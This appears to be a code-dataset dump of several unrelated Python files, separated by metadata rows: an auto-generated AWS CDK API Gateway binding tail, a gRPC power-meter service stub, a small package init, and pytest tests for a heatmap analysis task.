:param throttle: Overall throttle settings for the API. Default: none
"""
if isinstance(quota, dict): quota = QuotaSettings(**quota)
if isinstance(throttle, dict): throttle = ThrottleSettings(**throttle)
self._values = {
}
if api_key is not None: self._values["api_key"] = api_key
if api_stages is not None: self._values["api_stages"] = api_stages
if description is not None: self._values["description"] = description
if name is not None: self._values["name"] = name
if quota is not None: self._values["quota"] = quota
if throttle is not None: self._values["throttle"] = throttle
@property
def api_key(self) -> typing.Optional["IApiKey"]:
"""ApiKey to be associated with the usage plan.
default
:default: none
"""
return self._values.get('api_key')
@property
def api_stages(self) -> typing.Optional[typing.List["UsagePlanPerApiStage"]]:
"""API Stages to be associated which the usage plan.
default
:default: none
"""
return self._values.get('api_stages')
@property
def description(self) -> typing.Optional[str]:
"""Represents usage plan purpose.
default
:default: none
"""
return self._values.get('description')
@property
def name(self) -> typing.Optional[str]:
"""Name for this usage plan.
default
:default: none
"""
return self._values.get('name')
@property
def quota(self) -> typing.Optional["QuotaSettings"]:
"""Number of requests clients can make in a given time period.
default
:default: none
"""
return self._values.get('quota')
@property
def throttle(self) -> typing.Optional["ThrottleSettings"]:
"""Overall throttle settings for the API.
default
:default: none
"""
return self._values.get('throttle')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'UsagePlanProps(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
class VpcLink(aws_cdk.core.Resource, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.VpcLink"):
"""Define a new VPC Link Specifies an API Gateway VPC link for a RestApi to access resources in an Amazon Virtual Private Cloud (VPC)."""
def __init__(self, scope: aws_cdk.core.Construct, id: str, *, description: typing.Optional[str]=None, targets: typing.Optional[typing.List[aws_cdk.aws_elasticloadbalancingv2.INetworkLoadBalancer]]=None, vpc_link_name: typing.Optional[str]=None) -> None:
"""
:param scope: -
:param id: -
:param props: -
:param description: The description of the VPC link. Default: no description
:param targets: The network load balancers of the VPC targeted by the VPC link. The network load balancers must be owned by the same AWS account of the API owner. Default: - no targets. Use ``addTargets`` to add targets
:param vpc_link_name: The name used to label and identify the VPC link. Default: - automatically generated name
"""
props = VpcLinkProps(description=description, targets=targets, vpc_link_name=vpc_link_name)
jsii.create(VpcLink, self, [scope, id, props])
@jsii.member(jsii_name="addTargets")
def add_targets(self, *targets: aws_cdk.aws_elasticloadbalancingv2.INetworkLoadBalancer) -> None:
"""
:param targets: -
"""
return jsii.invoke(self, "addTargets", [*targets])
@jsii.member(jsii_name="validate")
def _validate(self) -> typing.List[str]:
"""Validate the current construct.
This method can be implemented by derived constructs in order to perform
validation logic. It is called on all constructs before synthesis.
"""
return jsii.invoke(self, "validate", [])
@property
@jsii.member(jsii_name="vpcLinkId")
def vpc_link_id(self) -> str:
"""Physical ID of the VpcLink resource.
attribute:
:attribute:: true
"""
return jsii.get(self, "vpcLinkId")
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.VpcLinkProps", jsii_struct_bases=[], name_mapping={'description': 'description', 'targets': 'targets', 'vpc_link_name': 'vpcLinkName'})
class VpcLinkProps():
def __init__(self, *, description: typing.Optional[str]=None, targets: typing.Optional[typing.List[aws_cdk.aws_elasticloadbalancingv2.INetworkLoadBalancer]]=None, vpc_link_name: typing.Optional[str]=None):
"""Properties for a VpcLink.
:param description: The description of the VPC link. Default: no description
:param targets: The network load balancers of the VPC targeted by the VPC link. The network load balancers must be owned by the same AWS account of the API owner. Default: - no targets. Use ``addTargets`` to add targets
:param vpc_link_name: The name used to label and identify the VPC link. Default: - automatically generated name
"""
self._values = {
}
if description is not None: self._values["description"] = description
if targets is not None: self._values["targets"] = targets
if vpc_link_name is not None: self._values["vpc_link_name"] = vpc_link_name
@property
def description(self) -> typing.Optional[str]:
"""The description of the VPC link.
default
:default: no description
"""
return self._values.get('description')
@property
def targets(self) -> typing.Optional[typing.List[aws_cdk.aws_elasticloadbalancingv2.INetworkLoadBalancer]]:
"""The network load balancers of the VPC targeted by the VPC link. The network load balancers must be owned by the same AWS account of the API owner.
default
:default: - no targets. Use ``addTargets`` to add targets
"""
return self._values.get('targets')
@property
def vpc_link_name(self) -> typing.Optional[str]:
"""The name used to label and identify the VPC link.
default
:default: - automatically generated name
"""
return self._values.get('vpc_link_name')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'VpcLinkProps(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
__all__ = ["ApiKey", "ApiKeyProps", "ApiKeySourceType", "AuthorizationType", "AwsIntegration", "AwsIntegrationProps", "BasePathMapping", "BasePathMappingOptions", "BasePathMappingProps", "CfnAccount", "CfnAccountProps", "CfnApiKey", "CfnApiKeyProps", "CfnApiMappingV2", "CfnApiMappingV2Props", "CfnApiV2", "CfnApiV2Props", "CfnAuthorizer", "CfnAuthorizerProps", "CfnAuthorizerV2", "CfnAuthorizerV2Props", "CfnBasePathMapping", "CfnBasePathMappingProps", "CfnClientCertificate", "CfnClientCertificateProps", "CfnDeployment", "CfnDeploymentProps", "CfnDeploymentV2", "CfnDeploymentV2Props", "CfnDocumentationPart", "CfnDocumentationPartProps", "CfnDocumentationVersion", "CfnDocumentationVersionProps", "CfnDomainName", "CfnDomainNameProps", "CfnDomainNameV2", "CfnDomainNameV2Props", "CfnGatewayResponse", "CfnGatewayResponseProps", "CfnIntegrationResponseV2", "CfnIntegrationResponseV2Props", "CfnIntegrationV2", "CfnIntegrationV2Props", "CfnMethod", "CfnMethodProps", "CfnModel", "CfnModelProps", "CfnModelV2", "CfnModelV2Props", "CfnRequestValidator", "CfnRequestValidatorProps", "CfnResource", "CfnResourceProps", "CfnRestApi", "CfnRestApiProps", "CfnRouteResponseV2", "CfnRouteResponseV2Props", "CfnRouteV2", "CfnRouteV2Props", "CfnStage", "CfnStageProps", "CfnStageV2", "CfnStageV2Props", "CfnUsagePlan", "CfnUsagePlanKey", "CfnUsagePlanKeyProps", "CfnUsagePlanProps", "CfnVpcLink", "CfnVpcLinkProps", "ConnectionType", "ContentHandling", "Cors", "CorsOptions", "Deployment", "DeploymentProps", "DomainName", "DomainNameAttributes", "DomainNameOptions", "DomainNameProps", "EmptyModel", "EndpointType", "ErrorModel", "HttpIntegration", "HttpIntegrationProps", "IApiKey", "IAuthorizer", "IDomainName", "IModel", "IRequestValidator", "IResource", "IRestApi", "Integration", "IntegrationOptions", "IntegrationProps", "IntegrationResponse", "IntegrationType", "JsonSchema", "JsonSchemaType", "JsonSchemaVersion", "LambdaIntegration", "LambdaIntegrationOptions", "LambdaRestApi", "LambdaRestApiProps", "Method", "MethodDeploymentOptions", "MethodLoggingLevel", "MethodOptions", "MethodProps", "MethodResponse", "MockIntegration", "Model", "ModelOptions", "ModelProps", "PassthroughBehavior", "Period", "ProxyResource", "ProxyResourceOptions", "ProxyResourceProps", "QuotaSettings", "RequestValidator", "RequestValidatorOptions", "RequestValidatorProps", "Resource", "ResourceBase", "ResourceOptions", "ResourceProps", "RestApi", "RestApiProps", "Stage", "StageOptions", "StageProps", "ThrottleSettings", "ThrottlingPerMethod", "UsagePlan", "UsagePlanPerApiStage", "UsagePlanProps", "VpcLink", "VpcLinkProps", "__jsii_assembly__"]
publication.publish()
| 51.972905 | 2,629 | 0.703523 | 91,785 | 782,608 | 5.854933 | 0.016125 | 0.051999 | 0.014587 | 0.017953 | 0.89739 | 0.880825 | 0.860609 | 0.850724 | 0.838246 | 0.825426 | 0 | 0.002164 | 0.179781 | 782,608 | 15,057 | 2,630 | 51.976357 | 0.835017 | 0.431995 | 0 | 0.721412 | 0 | 0 | 0.158195 | 0.058347 | 0 | 0 | 0 | 0 | 0 | 1 | 0.273329 | false | 0.006956 | 0.002206 | 0.090601 | 0.555989 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 10 |
f2c4777307efdbe7b07cca23715fdd7c9a29521f | 92 | py | Python | modules/sensor_stat/__init__.py | srcc-msu/job_statistics | 74680a4e4c105ebcff94f089e07fcb44dbcc12d9 | [
"MIT"
] | null | null | null | modules/sensor_stat/__init__.py | srcc-msu/job_statistics | 74680a4e4c105ebcff94f089e07fcb44dbcc12d9 | [
"MIT"
] | null | null | null | modules/sensor_stat/__init__.py | srcc-msu/job_statistics | 74680a4e4c105ebcff94f089e07fcb44dbcc12d9 | [
"MIT"
] | null | null | null | from modules.sensor_stat import api_controllers
from modules.sensor_stat import controllers
| 30.666667 | 47 | 0.891304 | 13 | 92 | 6.076923 | 0.538462 | 0.278481 | 0.43038 | 0.531646 | 0.683544 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.086957 | 92 | 2 | 48 | 46 | 0.940476 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
4b53c479c9aae3f73adcfe7a59ed6ba681ba8b91 | 13,257 | py | Python | instrosetta/interfaces/light_analysis/power_meter_pb2_grpc.py | jmosbacher/instrosetta-python | b323ee4d3db0b7d8e22ec731dac521c967e5323d | [
"MIT"
] | null | null | null | instrosetta/interfaces/light_analysis/power_meter_pb2_grpc.py | jmosbacher/instrosetta-python | b323ee4d3db0b7d8e22ec731dac521c967e5323d | [
"MIT"
] | null | null | null | instrosetta/interfaces/light_analysis/power_meter_pb2_grpc.py | jmosbacher/instrosetta-python | b323ee4d3db0b7d8e22ec731dac521c967e5323d | [
"MIT"
] | null | null | null | # Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
import grpc
from instrosetta.interfaces.light_analysis import power_meter_pb2 as instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2
class PowerMeterStub(object):
# missing associated documentation comment in .proto file
pass
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.Initialize = channel.unary_unary(
'/instrosetta.interfaces.light_analysis.power_meter.v1.PowerMeter/Initialize',
request_serializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.InitializeRequest.SerializeToString,
response_deserializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.InitializeResponse.FromString,
)
self.Shutdown = channel.unary_unary(
'/instrosetta.interfaces.light_analysis.power_meter.v1.PowerMeter/Shutdown',
request_serializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.ShutdownRequest.SerializeToString,
response_deserializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.ShutdownResponse.FromString,
)
self.GetPower = channel.unary_unary(
'/instrosetta.interfaces.light_analysis.power_meter.v1.PowerMeter/GetPower',
request_serializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.GetPowerRequest.SerializeToString,
response_deserializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.GetPowerResponse.FromString,
)
self.SetPower = channel.unary_unary(
'/instrosetta.interfaces.light_analysis.power_meter.v1.PowerMeter/SetPower',
request_serializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.SetPowerRequest.SerializeToString,
response_deserializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.SetPowerResponse.FromString,
)
self.GetCount = channel.unary_unary(
'/instrosetta.interfaces.light_analysis.power_meter.v1.PowerMeter/GetCount',
request_serializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.GetCountRequest.SerializeToString,
response_deserializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.GetCountResponse.FromString,
)
self.SetCount = channel.unary_unary(
'/instrosetta.interfaces.light_analysis.power_meter.v1.PowerMeter/SetCount',
request_serializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.SetCountRequest.SerializeToString,
response_deserializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.SetCountResponse.FromString,
)
self.GetWavelength = channel.unary_unary(
'/instrosetta.interfaces.light_analysis.power_meter.v1.PowerMeter/GetWavelength',
request_serializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.GetWavelengthRequest.SerializeToString,
response_deserializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.GetWavelengthResponse.FromString,
)
self.SetWavelength = channel.unary_unary(
'/instrosetta.interfaces.light_analysis.power_meter.v1.PowerMeter/SetWavelength',
request_serializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.SetWavelengthRequest.SerializeToString,
response_deserializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.SetWavelengthResponse.FromString,
)
self.GetMode = channel.unary_unary(
'/instrosetta.interfaces.light_analysis.power_meter.v1.PowerMeter/GetMode',
request_serializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.GetModeRequest.SerializeToString,
response_deserializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.GetModeResponse.FromString,
)
self.SetMode = channel.unary_unary(
'/instrosetta.interfaces.light_analysis.power_meter.v1.PowerMeter/SetMode',
request_serializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.SetModeRequest.SerializeToString,
response_deserializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.SetModeResponse.FromString,
)
self.GetAutorange = channel.unary_unary(
'/instrosetta.interfaces.light_analysis.power_meter.v1.PowerMeter/GetAutorange',
request_serializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.GetAutorangeRequest.SerializeToString,
response_deserializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.GetAutorangeResponse.FromString,
)
self.SetAutorange = channel.unary_unary(
'/instrosetta.interfaces.light_analysis.power_meter.v1.PowerMeter/SetAutorange',
request_serializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.SetAutorangeRequest.SerializeToString,
response_deserializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.SetAutorangeResponse.FromString,
)
class PowerMeterServicer(object):
# missing associated documentation comment in .proto file
pass
def Initialize(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Shutdown(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetPower(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def SetPower(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetCount(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def SetCount(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetWavelength(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def SetWavelength(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetMode(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def SetMode(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetAutorange(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def SetAutorange(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_PowerMeterServicer_to_server(servicer, server):
rpc_method_handlers = {
'Initialize': grpc.unary_unary_rpc_method_handler(
servicer.Initialize,
request_deserializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.InitializeRequest.FromString,
response_serializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.InitializeResponse.SerializeToString,
),
'Shutdown': grpc.unary_unary_rpc_method_handler(
servicer.Shutdown,
request_deserializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.ShutdownRequest.FromString,
response_serializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.ShutdownResponse.SerializeToString,
),
'GetPower': grpc.unary_unary_rpc_method_handler(
servicer.GetPower,
request_deserializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.GetPowerRequest.FromString,
response_serializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.GetPowerResponse.SerializeToString,
),
'SetPower': grpc.unary_unary_rpc_method_handler(
servicer.SetPower,
request_deserializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.SetPowerRequest.FromString,
response_serializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.SetPowerResponse.SerializeToString,
),
'GetCount': grpc.unary_unary_rpc_method_handler(
servicer.GetCount,
request_deserializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.GetCountRequest.FromString,
response_serializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.GetCountResponse.SerializeToString,
),
'SetCount': grpc.unary_unary_rpc_method_handler(
servicer.SetCount,
request_deserializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.SetCountRequest.FromString,
response_serializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.SetCountResponse.SerializeToString,
),
'GetWavelength': grpc.unary_unary_rpc_method_handler(
servicer.GetWavelength,
request_deserializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.GetWavelengthRequest.FromString,
response_serializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.GetWavelengthResponse.SerializeToString,
),
'SetWavelength': grpc.unary_unary_rpc_method_handler(
servicer.SetWavelength,
request_deserializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.SetWavelengthRequest.FromString,
response_serializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.SetWavelengthResponse.SerializeToString,
),
'GetMode': grpc.unary_unary_rpc_method_handler(
servicer.GetMode,
request_deserializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.GetModeRequest.FromString,
response_serializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.GetModeResponse.SerializeToString,
),
'SetMode': grpc.unary_unary_rpc_method_handler(
servicer.SetMode,
request_deserializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.SetModeRequest.FromString,
response_serializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.SetModeResponse.SerializeToString,
),
'GetAutorange': grpc.unary_unary_rpc_method_handler(
servicer.GetAutorange,
request_deserializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.GetAutorangeRequest.FromString,
response_serializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.GetAutorangeResponse.SerializeToString,
),
'SetAutorange': grpc.unary_unary_rpc_method_handler(
servicer.SetAutorange,
request_deserializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.SetAutorangeRequest.FromString,
response_serializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.SetAutorangeResponse.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'instrosetta.interfaces.light_analysis.power_meter.v1.PowerMeter', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
| 56.653846 | 139 | 0.807951 | 1,408 | 13,257 | 7.06179 | 0.073864 | 0.08237 | 0.065373 | 0.133058 | 0.867143 | 0.867143 | 0.867143 | 0.821281 | 0.815649 | 0.815649 | 0 | 0.005468 | 0.130874 | 13,257 | 233 | 140 | 56.896996 | 0.85749 | 0.067813 | 0 | 0.321244 | 1 | 0 | 0.131684 | 0.077647 | 0 | 0 | 0 | 0 | 0 | 1 | 0.072539 | false | 0.072539 | 0.010363 | 0 | 0.093264 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
4b689eb0ab3a46b758282dff494672894cd2b6b3 | 11,764 | py | Python | tests/unit/analytics/heatmap/test_main.py | thehyve/Fractalis | 5591112e5bc994eea5baf3d28caa7e5dfee85a57 | [
"Apache-2.0"
] | 7 | 2018-06-01T12:17:26.000Z | 2019-08-23T13:15:34.000Z | tests/unit/analytics/heatmap/test_main.py | thehyve/Fractalis | 5591112e5bc994eea5baf3d28caa7e5dfee85a57 | [
"Apache-2.0"
] | 6 | 2018-11-02T10:00:04.000Z | 2021-09-13T14:15:36.000Z | tests/unit/analytics/heatmap/test_main.py | LCSB-BioCore/Fractalis | a9f7f8da7675b55c5996d2f32d7baa7313b0350e | [
"Apache-2.0"
] | 3 | 2018-08-02T16:42:50.000Z | 2018-12-14T18:16:22.000Z | """This module provides tests for the heatmap analysis main module."""
import pytest
import pandas as pd
import numpy as np
from fractalis.analytics.tasks.heatmap.main import HeatmapTask
# noinspection PyMissingTypeHints
class TestHeatmap:
task = HeatmapTask()
def test_functional(self):
numerical_arrays = [
pd.DataFrame([[101, 'foo', 5], [101, 'bar', 6], [102, 'foo', 10],
[102, 'bar', 11], [103, 'foo', 15], [103, 'bar', 16],
[104, 'foo', 20], [104, 'bar', 21]],
columns=['id', 'feature', 'value'])
]
subsets = [[101, 102], [103, 104]]
result = self.task.main(numerical_arrays=numerical_arrays,
numericals=[],
categoricals=[],
ranking_method='B',
params={},
id_filter=[],
max_rows=100,
subsets=subsets)
assert 'data' in result
assert 'stats' in result
def test_functional_with_nans_and_missing(self):
numerical_arrays = [
pd.DataFrame([[101, 'foo', 5], [101, 'bar', 5],
[102, 'foo', 10],
[103, 'foo', float('nan')], [103, 'bar', 15],
[104, 'foo', 20], [104, 'bar', 20]],
columns=['id', 'feature', 'value'])
]
subsets = [[101, 102], [103, 104]]
result = self.task.main(numerical_arrays=numerical_arrays,
numericals=[],
categoricals=[],
ranking_method='B',
params={},
id_filter=[],
max_rows=100,
subsets=subsets)
for stat in result['stats']:
if stat != 'feature' and stat != 'AveExpr':
assert result['stats'][stat][0] == result['stats'][stat][1]
def test_main_raises_if_invalid_data(self):
numerical_arrays = [
pd.DataFrame([[101, 'foo', 5], [101, 'bar', 6], [102, 'foo', 10],
[102, 'bar', 11], [103, 'foo', 15], [103, 'bar', 16],
[104, 'foo', 20], [104, 'bar', 21]],
columns=['id', 'feature', 'value'])
]
subsets = [[1, 2, 3, 4]] # does not match sample colnames
with pytest.raises(ValueError) as e:
self.task.main(numerical_arrays=numerical_arrays,
numericals=[],
categoricals=[],
ranking_method='mean',
params={},
id_filter=[],
max_rows=100,
subsets=subsets)
assert 'data set is too small' in e
def test_empty_subset_equals_full_subset(self):
numerical_arrays = [
pd.DataFrame([[101, 'foo', 5], [101, 'bar', 6], [102, 'foo', 10],
[102, 'bar', 11], [103, 'foo', 15], [103, 'bar', 16],
[104, 'foo', 20], [104, 'bar', 21]],
columns=['id', 'feature', 'value'])
]
result_1 = self.task.main(numerical_arrays=numerical_arrays,
numericals=[],
categoricals=[],
ranking_method='mean',
params={},
id_filter=[],
max_rows=100,
subsets=[])
result_2 = self.task.main(numerical_arrays=numerical_arrays,
numericals=[],
categoricals=[],
ranking_method='mean',
params={},
id_filter=[],
max_rows=100,
subsets=[[101, 102, 103, 104]])
assert result_1 == result_2
def test_multiple_numerical_array_data(self):
numerical_arrays = [
pd.DataFrame([[101, 'foo', 5], [101, 'bar', 6],
[102, 'foo', 10], [102, 'bar', 11],
[103, 'foo', 15], [103, 'bar', 16],
[104, 'foo', 20], [104, 'bar', 21]],
columns=['id', 'feature', 'value']),
pd.DataFrame([[101, 'baz', 10], [102, 'baz', 11],
[105, 'foo', 20], [105, 'baz', 21],
[106, 'bar', 15]],
columns=['id', 'feature', 'value'])
]
subsets = [[101, 102, 106], [103, 104, 105]]
result = self.task.main(numerical_arrays=numerical_arrays,
numericals=[],
categoricals=[],
ranking_method='B',
params={},
id_filter=[],
max_rows=100,
subsets=subsets)
assert 'data' in result
assert 'stats' in result
def test_zscore_is_not_nan_if_data_misses_values(self):
numerical_arrays = [
pd.DataFrame([[101, 'foo', 5], [101, 'bar', 6],
[102, 'foo', 10], [102, 'bar', 11],
[103, 'foo', 15], [103, 'bar', 16],
[104, 'foo', 20], [104, 'bar', 21]],
columns=['id', 'feature', 'value']),
pd.DataFrame([[101, 'baz', 10], [102, 'baz', 11],
[105, 'foo', 20], [105, 'baz', 21],
[106, 'bar', 15]],
columns=['id', 'feature', 'value'])
]
subsets = [[101, 102, 106], [103, 104, 105]]
result = self.task.main(numerical_arrays=numerical_arrays,
numericals=[],
categoricals=[],
ranking_method='B',
params={},
id_filter=[],
max_rows=100,
subsets=subsets)
data = result['data']
data = pd.DataFrame(data)
assert not np.isnan(np.min(data['zscore']))
def test_results_are_sorted(self):
numerical_arrays = [
pd.DataFrame([[101, 'A', 5], [102, 'A', 5],
[101, 'B', 2], [102, 'B', 2],
[101, 'C', 8], [102, 'C', 8],
[101, 'D', 10], [102, 'D', 10]],
columns=['id', 'feature', 'value'])
]
subsets = []
result = self.task.main(numerical_arrays=numerical_arrays,
numericals=[],
categoricals=[],
ranking_method='mean',
params={},
id_filter=[],
max_rows=100,
subsets=subsets)
data = result['data']
data = pd.DataFrame(data)
feature_col = data['feature'].tolist()
assert ['D', 'C', 'A', 'B', 'D', 'C', 'A', 'B'] == feature_col
assert ['D', 'C', 'A', 'B'] == result['stats']['feature']
def test_max_rows_works(self):
numerical_arrays = [
pd.DataFrame([[101, 'A', 5], [102, 'A', 5],
[101, 'B', 2], [102, 'B', 2],
[101, 'C', 8], [102, 'C', 8],
[101, 'D', 10], [102, 'D', 10]],
columns=['id', 'feature', 'value'])
]
subsets = []
result = self.task.main(numerical_arrays=numerical_arrays,
numericals=[],
categoricals=[],
ranking_method='mean',
params={},
id_filter=[],
max_rows=2,
subsets=subsets)
data = result['data']
data = pd.DataFrame(data)
feature_col = data['feature'].tolist()
assert ['D', 'C', 'D', 'C'] == feature_col
assert result['stats']['feature'] == ['D', 'C']
def test_sorts_correct_for_different_criteria(self):
numerical_arrays = [
pd.DataFrame([[101, 'foo', 5], [101, 'bar', -12],
[102, 'foo', 10], [102, 'bar', -25],
[103, 'foo', 15], [103, 'bar', -20],
[104, 'foo', 20], [104, 'bar', -50]],
columns=['id', 'feature', 'value'])
]
subsets = [[101, 102], [103, 104]]
result = self.task.main(numerical_arrays=numerical_arrays,
numericals=[],
categoricals=[],
ranking_method='P.Value',
params={},
id_filter=[],
max_rows=100,
subsets=subsets)
stats = result['stats']['P.Value']
assert all([stats[i] < stats[i + 1] for i in range(len(stats) - 1)])
result = self.task.main(numerical_arrays=numerical_arrays,
numericals=[],
categoricals=[],
ranking_method='adj.P.Val',
params={},
id_filter=[],
max_rows=100,
subsets=subsets)
stats = result['stats']['adj.P.Val']
assert all([stats[i] < stats[i + 1] for i in range(len(stats) - 1)])
result = self.task.main(numerical_arrays=numerical_arrays,
numericals=[],
categoricals=[],
ranking_method='B',
params={},
id_filter=[],
max_rows=100,
subsets=subsets)
stats = result['stats']['B']
assert all([stats[i] > stats[i + 1] for i in range(len(stats) - 1)])
result = self.task.main(numerical_arrays=numerical_arrays,
numericals=[],
categoricals=[],
ranking_method='logFC',
params={},
id_filter=[],
max_rows=100,
subsets=subsets)
stats = result['stats']['logFC']
assert all([abs(stats[i]) > abs(stats[i + 1])
for i in range(len(stats) - 1)])
result = self.task.main(numerical_arrays=numerical_arrays,
numericals=[],
categoricals=[],
ranking_method='t',
params={},
id_filter=[],
max_rows=100,
subsets=subsets)
stats = result['stats']['t']
assert all([stats[i] > stats[i + 1] for i in range(len(stats) - 1)])
